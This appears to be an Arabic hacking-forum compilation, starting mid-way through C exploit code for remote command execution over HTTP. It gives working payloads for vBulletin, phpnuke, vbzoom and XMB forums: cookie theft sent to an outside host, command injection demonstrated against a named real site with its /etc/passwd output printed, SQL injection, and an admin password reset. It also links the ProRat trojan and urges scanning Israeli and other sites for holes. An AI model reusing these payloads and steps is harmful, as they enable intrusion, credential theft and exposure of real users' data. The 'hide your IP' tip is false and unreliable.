    if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) )
    strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
    /* A - Z */
    else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) )
    strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
    /* a - z */
    else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) )
    strncat(encoded_cmd, tmp, sizeof(encoded_cmd));
    /* everything not a letter or number */
    else
    {
    snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]);
    strncat(encoded_cmd, tmp2, sizeof(encoded_cmd));
    }
    }
    /* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */
    snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1\nHost: %s\n\n", path, url1,
    date, url2, encoded_cmd, url3, host);
    /* be verbose about the string we're sending in case we need to debug. */
    if (verbose == 1)
    printf("\nSending: %s", data);

    send(sockfd, data, sizeof(data), 0);

    if ( (f = fdopen(sockfd, "r+") ) == NULL)
    {
    perror("fdopen()");
    exit(1);
    }
    while(1)
    {
    fgets(output, sizeof(output), f);
    if (feof(f) != 0)
    break;
    else
    printf("%s", output);
    memset(&output, '\0', sizeof(output));
    }

    memset(&cmd_buf, '\0', sizeof(cmd_buf));
    memset(&encoded_cmd, '\0', sizeof(encoded_cmd));
    memset(&data, '\0', sizeof(data));
    memset(&output, '\0', sizeof(output));

    fclose(f);

    if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
    perror("socket()");
    exit(1);
    }
    alarm(timeout);
    if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1)
    {
    perror("connect()");
    exit(1);
    }
    alarm(0);
    }
    return 0;
    }
    -----------------------------------

    منقول من موقع أمريكي يالي بدو يترجو يحط ترجمتوا بالموضوع هذا
    ______________________________
    ثغرة vBulletin


    quote:
    --------------------------------------------------------------------------------
    Originally posted by MAKS:
    Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or ********** into the ********. So by directing a user to, for example:

    http://vulnerable/forum/memberlist....E********%3D%27
    http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%


    2Ephp%3F****%3D%27%2B
    escape%28********%2E****ie%29%3C%2F******%3E
    (NOTE: The URL should be on a one line)

    You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file:
    ********>
    ******** = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3C******%3E********%3D
    %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco


    rd%2Ephp%3F****%3D%27
    %2Bescape%28********%2E****ie%29%3C%2F******%3E"
    ***********
    And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/****ie stealing code, and then to http://www.swgmotu.com.

    With the recorded user id and password hash, we can access the site:
    http://www.vbulletin.com/forum/index.php?bbuserid=[userid]&bbpassword=[password hash]
    -----------------------------------------------------------------------------------

    منقول من موقع امركي
    --------------------------------------------------------------------------------




    يتبع.....................................
    __________________________________________________ ____
    اختراق جميع المنتديات......الجزء 3 والاخير
    ________________________________________

    ثغرة في منتديات vbulletin 2.0.3

    بسم الله الرحمن الرحيم



    الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل

    فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على

    vbulletin 2.0.3

    طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو

    http://www.romulus2.com <بعرف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة>

    و طبقنا الثغرة ظهر الشكل

    http://www.romulus2.com/forum/calen...001-8-15&comma=";echo%20'';%20echo%20`<command>%20`;die ( );echo"

    و مكان <command> نحط الامر الي بدنا ياه

    فاول شي قلنا خلينا نعرف مين نحنا فحطينا

    whoami

    و الي طلع


    انا استبشرت خير على الاقل مني nobody

    فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت

    cat /etc/passwd مكان <command>

    و طلع

    root:x:0:0:root:/root:/bin/bash
    bin:x:1:1:bin:/bin:
    daemon:x:2:2aemon:/sbin:
    adm:x:3:4:adm:/var/adm:
    lp:x:4:7:lp:/var/spool/lpd:
    sync:x:5:0:sync:/sbin:/bin/sync
    shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    mail:x:8:12/var/spool/mail:
    news:x:9:13:news:/var/spool/news:
    uucp:x:10:14:uucp:/var/spool/uucp:
    operator:x:11:0perator:/root:
    games:x:12:100:games:/usr/games:
    gopher:x:13:30:gopher:/usr/lib/gopher-data:
    ftp:x:14:50:FTP User:/home/ftp:
    nobody:x:99:99:Nobody:/:
    gtd:x:501:100::/home/gtd:/bin/bash
    majordomo:x:504:103::/home/majordomo:/bin/bash
    quota25:*:505:1::/home/quota25:
    quota50:*:506:1::/home/quota50:
    quota75:*:507:1::/home/quota75:
    quota100:*:508:1::/home/quota100:
    quota150:*:509:1::/home/quota150:
    quota300:*:510:1::/home/quota300:
    quota2:*:511:1::/home/quota2:
    quota5:*:512:1::/home/quota5:
    quota10:*:513:1::/home/quota10:
    msql:x:497:100::/home/msql:/bin/bash
    userquota:x:503:100:quota:/home/userquota:/bin/bash
    johnv:*:516:1::/home/johnv:
    minerva:x:514:516::/home/minerva:/bin/bash
    taosfineart:x:517:517::/home/taosfineart:/bin/bash
    technoasylum:x:518:518::/home/technoasylum:/bin/bash
    ward-tech:x:519:519::/home/ward-tech:/bin/bash
    malio:x:522:522::/home/malio:/bin/bash
    cindyland:x:529:529::/home/cindyland:/bin/bash
    mathom-house:x:532:532::/home/mathom-house:/bin/bash
    libertywebhosting:x:534:534::/home/libertywebhosting:/bin/bash
    bonfiglioreed:x:537:537::/home/bonfiglioreed:/bin/bash
    oldtymespizza:x:539:539::/home/oldtymespizza:/bin/bash
    dogshowjournal:x:546:545::/home/dogshowjournal:/bin/bash
    surfclassic:x:550:549::/home/surfclassic:/bin/bash
    thomason-development:x:552:551::/home/thomason-development:/bin/bash
    james:x:553:534::/home/james:/bin/emailonly
    alexr:x:554:534::/home/alexr:/bin/emailonly
    god:x:555:522::/home/god:/bin/emailonly
    sales:x:556:522::/home/sales:/bin/bash
    info:x:557:522::/home/info:/bin/emailonly
    ryugen:x:558:552::/home/ryugen:/bin/bash
    allanart:x:566:559::/home/allanart:/bin/bash
    womensphotoworks:x:573:564::/home/womensphotoworks:/bin/bash
    mbaentry:x:576:567::/home/mbaentry:/bin/bash
    omahasoaring:x:577:568::/home/omahasoaring:/bin/bash
    talvee:x:582:549::/home/talvee:/bin/emailonly
    mobilewashenvironmental:x:585:572::/home/mobilewashenvironmental:/bin/bash
    mobilewashservices:x:589:576::/home/mobilewashservices:/bin/bash
    ocdeaf:x:591:578::/home/ocdeaf:/bin/bash
    foxfire-goldens:x:592:579::/home/foxfire-goldens:/bin/bash
    finchair:x:594:580::/home/finchair:/bin/bash
    americanabatement:x:595:581::/home/americanabatement:/bin/bash
    whiskersgraphics:x:596:582::/home/whiskersgraphics:/bin/bash
    ronemous:x:604:568::/home/ronemous:/bin/emailonly
    parrotranch:x:605:588::/home/parrotranch:/bin/bash
    erlefamily:x:606:589::/home/erlefamily:/bin/ftponly
    parduhn:x:610:593::/home/parduhn:/bin/bash
    riptideproductions:x:616:596::/home/riptideproductions:/bin/bash
    kaialece:x:626:604::/home/kaialece:/bin/bash
    zeeksystems:x:627:605::/home/zeeksystems:/bin/bash
    trevor:x:630:596::/home/trevor:/bin/emailonly
    dino:x:631:522::/home/dino:/bin/emailonly
    loconsigo:x:632:608::/home/loconsigo:/bin/bash
    delamerevineyard:x:643:613::/home/delamerevineyard:/bin/bash
    michael:x:652:605::/home/michael:/bin/emailonly
    jereme:x:654:596::/home/jereme:/bin/emailonly
    windows-tips:x:655:624::/home/windows-tips:/bin/bash
    ghost-ride:x:657:626::/home/ghost-ride:/bin/bash
    cprltd:x:663:629::/home/cprltd:/bin/bash
    batmanandbarbie:x:673:636::/home/batmanandbarbie:/bin/bash
    housegroove:x:674:637::/home/housegroove:/bin/bash
    washglass:x:675:638::/home/washglass:/bin/bash
    djmattson:x:676:639::/home/djmattson:/bin/bash
    statecapitols:x:677:640::/home/statecapitols:/bin/bash
    kanjiweb:x:678:641::/home/kanjiweb:/bin/bash
    freevg:x:681:644::/home/freevg:/bin/bash
    writersresource:x:682:645::/home/writersresource:/bin/bash
    evilgraphics:x:684:647::/home/evilgraphics:/bin/bash
    magdalenhsuli:x:690:650::/home/magdalenhsuli:/bin/bash
    antioch:x:704:659::/home/antioch:/bin/bash
    lifelinks:x:705:660::/home/lifelinks:/bin/bash
    sinecos:x:707:662::/home/sinecos:/bin/bash
    dosdonas:x:711:666::/home/dosdonas:/bin/bash
    accuratelegalprocessingse:x:713:668::/home/accuratelegalprocessingse:/bin/bash
    jc:x:716:581::/home/jc:/bin/emailonly
    jo:x:717:581::/home/jo:/bin/emailonly
    infoaai:x:719:581::/home/infoaai:/bin/emailonly
    gypsytejas:x:721:671::/home/gypsytejas:/bin/bash
    j-j-c:x:724:674::/home/j-j-c:/bin/bash
    camp:x:726:660::/home/camp:/bin/emailonly
    marinabaypark:x:740:677::/home/marinabaypark:/bin/bash
    gypsy:x:741:671::/home/gypsy:/bin/emailonly
    meg:x:749:593::/home/meg:/bin/emailonly
    huwe:x:751:679::/home/huwe:/bin/bash
    ultimateautomotive50:x:753:681::/home/ultimateautomotive50:/bin/bash
    socceracademypa:x:755:683::/home/socceracademypa:/bin/bash
    phoenixfamilymuseum:x:761:689::/home/phoenixfamilymuseum:/bin/bash
    videoteacher:x:762:690::/home/videoteacher:/bin/bash
    spiffydesign:x:765:693::/home/spiffydesign:/bin/bash
    nawaf:x:766:694::/home/nawaf:/bin/bash
    ccdump:x:768:696::/home/ccdump:/bin/bash
    drwizard-atlanta:x:772:700::/home/drwizard-atlanta:/bin/bash
    showme-powerchutes:x:777:705::/home/showme-powerchutes:/bin/bash
    ****lmandanceacademy:x:778:706::/home/****lmandanceacademy:/bin/bash
    samelec:x:779:707::/home/samelec:/bin/bash
    pet-odor:x:780:708::/home/pet-odor:/bin/bash
    michael1:x:781:593::/home/michael1:/bin/emailonly
    mmnursereview:x:785:710::/home/mmnursereview:/bin/bash
    franksland:x:787:712::/home/franksland:/bin/bash
    gr8gifts4u:x:801:717::/home/gr8gifts4u:/bin/bash
    globalintercultural:x:806:718::/home/globalintercultural:/bin/bash
    gotcher-belote:x:807:719::/home/gotcher-belote:/bin/bash
    francisengineering:x:808:720::/home/francisengineering:/bin/bash
    befree2:x:814:726::/home/befree2:/bin/bash
    barclay:x:821:689::/home/barclay:/bin/emailonly
    airupdate:x:823:732::/home/airupdate:/bin/bash
    stream:x:825:734::/home/stream:/bin/bash
    strantech:x:826:735::/home/strantech:/bin/bash
    newcityftp:x:832:740::/home/newcityftp:/bin/bash
    nagomifan:x:833:741::/home/nagomifan:/bin/bash
    gecko:x:834:671::/home/gecko:/bin/emailonly
    chooseyourlife:x:838:745::/home/chooseyourlife:/bin/bash
    binarytech:x:839:746::/home/binarytech:/bin/bash
    <<<طبعا ملف الباس كله طويل لكن حطيته جزء منه مشان تشوفوه>>>>

    ممم سيرفر جيد و حطيت نسخة عنه في مكتبة ملفات الباسوورد عندي للذكرى المهم نشوف الموقع اشو حكايته

    romulus2:x:997:837::/home/romulus2:/bin/bash
    اووووه حركات يوصل ل /bin/bash

    االمهم فكرت كيف حناخد الباسوورد حق هدا الموقع
    صاحبي قلي شوف الشادو قلتلو لا تتعب نفسك الشادو هذي الايام مخفي ايام زماااااااااااااااان

    فقلت خلص نشوف الكونفيق و ان شاء الله يكون صاحب الموقع غبي و حط نفس الباس

    من ملف الباسوود لاحظت انه الملف هو

    /home/romulus2

    و في طريقة تانية انك تكتب pwd

    كتبت و طلع

    /home2/www/romulus2/forum

    اذا هذا هو مكان ملفات الموقع الصحيحة و اضفت لها

    /admin/config.php

    فصار الامر

    cat /home2/www/romulus2/forum/admin/config.php
    _________________
    [email protected]

    __________________________________________________
    __
    -----------------------------------------------------------------------------------
    ثغرة مجلة phpnuke

    ثغرة مجلة phpnuke


    http://www.example.com/modules.php?...iewforum&forum='%20OR%201=1%20INTO% 20OUTFILE%20'[/path]/vf.txt'/*



    تضع بدلا منwww.example.com أسم الموقع الذي تريده




    منقووول

    ____________________________________
    اختراق منتديات vbzoom
    ------------------------------------------------
    السلام عليكم
    شباب انا اقدم لكم اهم ثغره معى الشرح المفصل
    <form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
    <input type="hidden" name="ChangeProfile" value="1">
    User Name: <input type="text" name="UserName"><br>
    Password: <input type="text" name="Password"><br>
    Email: <input type="text" name="Email">
    <input type="hidden" name="HomePage" value="lamerZ">
    <input type="hidden" name="VBZooMForum****iesUserName" value="false">
    <input type="hidden" name="VBZooMForum****iesUserName" value="false">
    <input type="submit" value="reset password">
    </form


    <form name="f1" action="هنا تضع وصله الموقع " method="POST">
    <input type="hidden" name="ChangeProfile" value="1">
    User Name: <input type="text" name="UserName"><br>
    Password: <input type="text" name="Password"><br>
    Email: <input type="text" name="Email">
    <input type="hidden" name="HomePage" value="lamerZ">
    <input type="hidden" name="VBZooMForum****iesUserName" value="false">
    <input type="hidden" name="VBZooMForum****iesUserName" value="false">
    <input type="submit" value="reset password">
    </form
    وبعد ان تحط وصل الموقع
    تسويه في صفحه html
    وتكتب اسم الادمين والباسورد الجديده وايميل جديد
    تحياتي
    _________________


    ثغرة في منتديات من نوع XMB
    --------------------------------------------------------
    بسم الله الرحمن الرحيم
    طريقة الاختراق :

    ثغرة جديدة في منتديات من نوع XMB

    الشرح والتطبيق

    1- عليك بالذهاب الى موقع جوجل http://www.google.com
    2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final
    3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء
    لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده.
    4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى
    index_log.log يعني راح يكون زي كده
    http://www.******.com/massegboard/index_log.log
    5- راح ينزل عندك ملف والملف عباره عن ملف زي الكوكيز كبير وفيه اسماء
    المستخدمين والباسورد وأشياء ثانيه ماتهمنا.
    6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع
    وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه.
    7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك هيك مثلا:
    xmbuser=admin
    والباسورد راح تلقاه قدامه زي كذه
    xmbpw=1faeb6747a31c854800ddf3c62b1717a
    8- طبعا الباسورد في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة
    CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج
    ftp://www.cafecounterintelligence.com/cci/chigger.exe


    افتح البرنامج وفي :


    رقم (1) قم بوضع علامة صح.
    رقم (2) قم بوضع اسم العضو سواء مدير او غيره
    رقم (3) قم بوضع الباسورد المشفر حق العضو او المدير او غيره
    رقم (4) قم بوضع علامة صح.
    رقم (5) قم بوضع البروكسي الي تريده اوالبروكسي حق مزوده الخدمه حقك
    رقم (6) قم بوضع المنفذ حق البروكسي

    10- بقي شيء واحد بعد اتمام الأعدادات حقت البرنامج بقي ان تذهب الى
    المتصفح انترنت اكسبلورر > اضغط بالزر اليمين> الأتصالاات> اعدادات>
    قم بوضع البروكسي هذا 127.0.0.1> والمنفذ 8080
    11- بعد ذلك اذهب للمنتدى المستهدف وتجول فيه وكأنك المدير تبع المنتدى
    وسوي الي بدك ياه

    الاجزاء الثلاثه منقوله

    خلى الماسنجر يتكلم بصوتك انتا
    ________________________________________

    لو عايز الماسنجر يقول لك انه جاك ايميل بصوتك
    وتقدر تحط اي شي اغنيه او اي شي انت تبيه
    اذا تبي الماسنجر يقول لك انه جاك ايميل بصوتك انت
    بدلاً من خروج نافذة أمامه عـلى سطح المكتب عـلماً أن
    هذه الحركة عـملـت معي في مسنجر الهوتمل msn وبحركة
    غـريبة جـداً وعـملها بسيط وهــو كالتالـي : ـ


    - سجل صوتك بملف خاص وخلي اسمه newemail مع العلم أنه يشترط ان يكون
    الملف على هيئة
    wav وقم بتخزينه داخل الملف الموجود في المسنجر

    طبعا انت عندما تحزن الملف الذي قمت بنشاءه وضعه في المجلد الخاص في
    الماسنجر ستجد ان
    هناك ملف يحمل نفس اسم ملفك هو newemail استبدل هذا الملف بملفك الخاص الذي
    قمت بتسجيل صوتك او اغنيتك المفضله ......................
    وبهذه الطريقة سوف يتغير الصوت في مسنجر الهوتمل بدل مايصدر صوت
    تنبيه يعلمك ان لديك رساله جديدة حيث يتكلم
    ويقول ( لديك رساله جديده بعـلبة الوارد ) او يصدر اغنيتك المفضله oooo


    اخفاء ip الخاص بك .
    ________________________________________


    الأي بي ( IP ) هو رقم جهازك علي الشبكة
    ويعتمد الهاكرز علي رقم الأي بي للدخول الى جهازك

    ولاخفاء الــip اتبع التالي ..

    1- إضغط على قائمة إبدأ Start
    2-إختار تشغيل Run
    3-ثم أكتب Command ثم إضغط موافق Ok
    4-أكتب الأمر الأتى drwatson ثم إضغط Enter

    وسوف تظهر لك صورة رأس شخص شعره اصفر
    على شريط المهام ...
    افلام لتعليم الهكرز..........!
    ________________________________________

    بسم اللة الرحمن الرحيم

    اول فيلم لتعليمbufferover flow ودة الرابط بتاعة
    http://www.astalavista.com/index.php?section=dir&id=166


    تانى فيلم لتعليم استخدام برنامج Brutus لفك باسورد ال telnet ودة الرابط بتاعه
    http://www.irongeek.com/videos/brutus1.avi


    تالت فيلم لتعليم استخدام برنامج Cain لعمل Sinffer لل Ethernet لمعرفة الباسوردات ودة الرابط بتاعة
    http://www.irongeek.com/videos/cain1.avi


    رابع فيلم لتعليم طريقة استخدام امر الNet use و ال Telnetودة الرابط بتاعة
    http://www.irongeek.com/videos/installvnc.avi


    خامس فيلم لتعليم
    طريقة التحكم فى كمبيوتر على النتورك عن طريق الريجيسترى ودة الرابط بتاعة
    http://www.irongeek.com/videos/interactivecmd.avi


    سادس فيلم لتعليم ال Sinffer و Spoofing ودة الرابط بتاعة
    http://www.irongeek.com/videos/snif...nd-a-switch.avi


    سابع فيلم لتعليم تتبع الايميلات و معرفة معلومات عن جهة الارسال ودة الرابط بتاعة
    http://www.irongeek.com/videos/e-mail-ip.avi


    وتامن فيلم لتعليم فك ال sam file عن طريق ال John , Samdump2 ودة الرابط بتاعة
    http://www.irongeek.com/i.php?page=...samdump2auditor


    تاسع فيلم لتعليم ال Nmap لفحص البورتات المفتوحه فى المواقع و الاجهزه ودة الرابط بتاعة
    http://www.irongeek.com/i.php?page=videos/nmap1


    عاشر واخر فيلم عن كيفية جعل windows xp يشبه هى windows 2000ودة الرابط بتاعة
    http://www.irongeek.com/i.php?page=...to2000interface

    أظهار الباسورد التي على شكل نجمات
    ________________________________________


    وظيفتهـ : أظهار الباسورد التي على شكل نجمات


    حجمهـ : 486 KB فقط

    يعمل على : Windows 95, 98, ME, NT, 2000, or XP
    http://www.iopus.com/download/iopus-pwdrec-setup.exe
    سيريال البرنامج : RE6521387527887
    والبرنا مج مش محتاج لشرح انتا بتاخد المفتاح وتروح عند النجوم
    هايظهر الباسورد

    prorat1.9
    ________________________________________

    اقوي برنامج هاك اتعمل وهيتعمل
    فكره البرنامج بتقوم زي اغلب برامج الهاك
    سيرفر بتبعته للضحيه
    اول ما بيستقبله ويفتحه السيرفر بيطير
    وهوووووووووب
    يرووووووووح قافش الجهاز بتاعه
    واعمل انت اللى عايزه بئى يا حلو
    كلمه السر لفتح الباص من على ملف الزايب هوة
    pro

    اهوة
    http://www.prorat.net/downloads.php?id=ProRat_v1.9_Fix2
    بس امانه الا يستخدم فى ايذاء المسلمين

    طريقة في اختراق المواقع
    ________________________________________

    بسم الله الرحمن الرحيم


    السلام عليكم

    ارجوا عدم استخدام هذه الطرق او الطريقة فيما حرمه الله وانا ابرئ ذمتي من كل استخدام محرم الا هل بلغت اللهم اشهد!

    اهلا بالجميع طريقتي اليوم سهلة وبسيطة للي يبي فعلا يخترق موقع يستاهل انه يخترق يالله نبدأ بسم الله..

    انت اذا لقيت مواقع خسيس يستاهل انه يخترق مثل اسرائيلي او يسب في الاسلام او او او تروح تدخل على هذا الموقع
    http://www.netcraft.com


    على اليسار تلقى مربع اكتب فيه الموقع المراد اختراقه بهذه الطريقة name.com
    بدون www او http:// او / الي بالاخير

    ومثلا على ذلك هذا الموقع http://www.globes.co.il/


    نروح نكتبه في الموقع http://www.netcraft.com
    ونضغط انتر وبعدها بتفتح عندك صفحة جديدة

    المهم فيها كلام واجد والمهم في ذلك هو هذه الجملة
    The site globes.co.il is running Microsoft-IIS/5.0 on Windows 2000.

    شوف انت من النظرة بتفهم ان الموقع شغال على Microsoft-IIS/5.0 وعلى الويندوزWindows 2000 اوكي هذه هي اول نقطة الحين خلصناها

    طيب الحين الي عليك تروح تبحث عن ثغرات هذا النظام والمعروف ان IIS له ثغرات كثيرة او ثغرات Windows 2000 المهم ما علينا انت بتقول كيف اقدر اطلع هالثغرات لاني ما اعرفها؟؟

    ببساطة راح اقولك هناك العديد من البرامج الي تتيح لك انك تبحث في الموقع اذا فيه ثغرات او لا برامج مشهورة وكثيرة منها ::

    1- N-Stealth
    ---------------------------------------------
    -(أداة رائعة وقوية وتتميز باكتشاف نظام الموقع وثغراته)-
    ---------------------------------------------

    &

    2- Shadow Security Scanner
    ---------------------------------------------
    -(برنامج ذو شهرة عالية وفعالية كبيرة في فحص المواقع من المنافذ والثغرات)-
    ---------------------------------------------

    &

    3- Omran Scanner
    ---------------------------------------------
    -(برنامج عربي من برمجة الأخ/عمران الغامدي ولابأس به لاكتشاف الثغرات ويحتوي على ملفات للبحث مثل:Linux-Unix-NT)-
    ---------------------------------------------

    &

    4- CGI Scanner
    ---------------------------------------------
    -(مختص في البحث عن ثغرات CGI وهو الأفضل في عمل ذلك)-
    ---------------------------------------------

    &

    5- UniScan
    ---------------------------------------------
    -(كالسابق ولكن هذا البرنامج خاص بفحص ثغرات UNicode)-
    ---------------------------------------------

    &

    6- Retina Apache Chunked
    ---------------------------------------------
    -(للبحث عن الأجهزة والمواقع التي تملك ثغرة Apache)-
    ---------------------------------------------

    &

    7- SamiScaN
    ---------------------------------------------
    -(أداة رائعة وعربية يعرض نظام التشغيل والملقم والعنوان الحقيقي ويتحوي على أربع ملفات لإيجاد الثغرات:
    cfusion.txt, cgi.txt, cgi2.txt, NT.txt)-
    ---------------------------------------------


    &

    8- voideye
    ---------------------------------------------
    -(نسمع عنه كثيرا وهو لأنه أقدم برنامج في البحث عن الثغرات يملك واجهة جميلة ولكني لاأفضله على sss)-

    هذه بعض اشهر برامج البحث عن الثغرات وانا انصحك تستخدم برنامج عمران للكشف عن ثغرات المواقع لانه عربي وسهل التعامل ويمكنك تحميله من هذه الوصلة :
    الرابط لايعمل

    اذا ما حمل عندك اضغط باليمين ثم حفظ الهدف باسم

    على العموم لما تشغل البرنامج عمران نبدأ فيه خطوة بخطوة:
    أول شيء هو من حاله بيوضع البروكسي في مكان proxy information

    الثانية انك توضع الموقع الي قلنا عنه في المثال في مكان SITE توضعه كذا http://www.globes.co.il
    مع مراعة انك تشيل / الي بالاخير

    الثالثة وهي اهم شي انك توضع الملف الي به الثغرات .. البرنامج عمران يساعدك بأنه مع البرنامج الي بتحمله ملفات txt كثيرة وهي متعددة وكلها تحمل ثغرات وبإمكانك تحمل من النت ملفات لكن انت الحين خلك بـ الي موجود مع البرنامج احسن .. الملفات مقسمة بحسب الثغرات الخاصة بالأنظمة وهي كالتالي :

    ملفات ثغرات اللينكس : linux5.txt - linuxScan.txt - linuxscan2.txt حتى 4
    ملفات ثغرات NT : NTSCAN.txt - NT2.txt - NT3.txt - NT4.txt - NT5.txt
    ملفات ثغرات اليونيكود و IIS4.0 و IIS5.0 : unicode.txt - unicode2.txt - u.txt - 3.txt 4.txt - 5.txt
    ملفات ثغرات لأنظمة متنوعة ((مثلا فرونت بيج)) : can.txt - scan2.txt - scan3.txt حتى scan6.txt
    بالإضافة إلى الملف AHLIZ.txt

    على العموم انت من نظرتك للملفات تعرف ان مدام الموقع شغال على نظام IIS5.0 فإنك تقدر تستخدم هذه الملفات unicode.txt - unicode2.txt - u.txt - 3.txt 4.txt - 5.txt

    الرابعة هذه خطوة مهمة كلمة Scan List بجانبها Add File اضغط عليها واختر احد هذه الملفات المذكورة في الأعلى ولنفرض اخترنا الملف u.txt نروح الحين تحت ونضغط على الكلمة Start Scan

    الحين يا سادتي الكرام بدأ البرنامج بالبحث وعندما يظهر لك أي ثغرة ناجحة راح يكتبها في المربع الي مكتوب فوقه OK Results وانت اذا ما عرفت تتعامل مع الثغرة اسأل في المنتدى

    المهم اذا خلص البحث ولم يجد اي ثغرة روح الى Add File واختر ملف آخر مثلا 3.txt وكالحين اختر واحد لحد ما تشوف لك ثغرة طيب انت بتقول كيف اعرف انه خلص من البحث؟؟

    اقولك ببساطة اذا كتب آخر شي في المربع الي مكتوب فوقه Traffic Date اذا طلع آخر شي مكتوب All Finished او اصبح زر Start Scan تقدر تضغط عليه معناه انه انتهى

    وبعد اكتشافه للثغرة انسخها والصقها بالمتصفح وكما قلت اذا ما عرفت تتعامل معها اسأل بالمنتدى

    انشا الله اكون وفقت في شرحي لهذه الطريقة ولكن أرجوا عدم استخدام هذه الطريقة فيما حرم الله وانا ابرئ ذمتي من كل استخدام محرم ألا هل بلغت اللهم اشهد !!
    الاختراق ج1
    ________________________________________

    بسم الله الرحمن الرحيم
    نبدا باذن الله تعليم الاختراق وكيفية الاختراق واساليب الاختراق





    الدرس الأول

    _____________-الإختراق : أنواعة ودوافعة____________


    ** تعريف الأختراق **

    الإختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة

    عن طريق ثغرات في نظام الحماية الخاص بالهدف وبطبيعة الحال هي سمة سيئة

    يتسم بها المخترق لقدرته على دخول أجهزة الأخرين عنوه ودون رغبة منهم

    وحتى دون علم منهم بغض النظر عن الأضرار الجسيمة التي قد يحدثها سواء

    بأجهزتهم الشخصية او بنفسياتهم عند سحبة ملفات وصور تخصهم وحدهم . ما

    الفرق هنا بين المخترق للأجهزة الشخصية والمقتحم للبيوت المطمئنة الآمنه ؟؟

    أرائيتم دناءة الأختراق وحقارته.


    _____________أسباب الإختراق ودوافعه _____________


    لم تنتشر هذه الظاهرة لمجرد العبث وإن كان العبث وقضاء وقت الفراغ من أبرز

    العوامل التي ساهمت في تطورها وبروزها الي عالم الوجود . وقد أجمل

    المؤلفين الثلاثة للمراجع التي استعنت بها في هذة الدروة الدوافع الرئيسية

    للأختراق في ثلاث نقاط اوجزها هنا على النحو التالي :

    1- الدافع السياسي والعسكري: ممالاشك فيه أن التطور العلمي والتقني أديا

    الي الأعتماد بشكل شبة كامل على أنظمة الكمبيوتر في أغلب الاحتياجات

    التقنية والمعلوماتية. فمنذ الحرب البارردة والصراع المعلوماتي والتجسسي بين

    الدولتين العظميين على أشده. ومع بروز مناطق جديده للصراع في العالم وتغير

    الطبيعة المعلوماتيه للأنظمة والدول ، اصبح الأعتماد كليا على الحاسب الألي

    وعن طريقة اصبح الاختراق من اجل الحصول على معلومات سياسية وعسكرية

    واقتصادية مسالة أكثر أهمية.

    2- الدافع التجاري: من المعروف أن الشركات التجارية الكبرى تعيش هي ايضا

    فيما بينها حربا مستعرة ( الكوكا كولا والبيبسي كولا على سبيل المثال) وقد

    بينت الدراسات الحديثة أن عددا من كبريات الشركات التجارية يجرى عليها أكثر

    من خمسين محاولة إختراق لشبكاتها كل يوم.

    3- الدافع الفردي: بداءت اولى محاولات الأختراق الفردية بين طلاب الجامعات

    بالولايات المتحدة كنوع من التباهي بالنجاح في إختراق اجهزة شخصية

    لأصدقائهم ومعارفهم ومالبثت أن تحولت تلك الظاهرة الي تحدي فيما بينهم في

    اختراق الأنظمة بالشركات ثم بمواقع الأنترنت. ولايقتصر الدافع على الأفراد فقط

    بل توجد مجموعات ونقابات اشبة ماتكون بالأنديه وليست بذات أهداف تجارية.

    بعض الأفراد بشركات كبرى بالولايات المتحدة ممن كانوا يعملون مبرمجين

    ومحللي نظم تم تسريحهم من اعمالهم للفائض الزائد بالعمالة فصبوا جم غضبهم

    على انظمة شركاتهم السابقة مفتحمينها ومخربين لكل ماتقع ايديهم علية من

    معلومات حساسة بقصد الأنتقام . وفي المقابل هناك هاكرز محترفين تم القبض

    عليه بالولايات المتحدة وبعد التفاوض معهم تم تعيينهم بوكالة المخابرات

    الأمريكية الس أي اي وبمكتب التحقيقات الفيدرالي الأف بي أي وتركزت معظم

    مهماتهم في مطاردة الهاكرز وتحديد مواقعهم لأرشاد الشرطة اليهم .
    ____________--أنواع الأختراق ____________


    يمكن تقسيم الإختراق من حيث الطريقة المستخدمة الي ثلاثة أقسام:

    1- إختراق المزودات او الأجهزة الرئيسية للشركات والمؤسسات او الجهات

    الحكومية وذلك بأختراق الجدران النارية التي عادة توضع لحمايتها وغالبا مايتم

    ذلك باستخدام المحاكاة Spoofing وهو مصطلح يطلق على عملية إنتحال

    شخصية للدخول الي النظام حيث أن حزم الـ IP تحتوي على عناوين للمرسل

    والمرسل اليه وهذة العناوين ينظر اليها على أنها عناوين مقبولة وسارية

    المفعول من قبل البرامج وأجهزة الشبكة . ومن خلال طريقة تعرف بمسارات

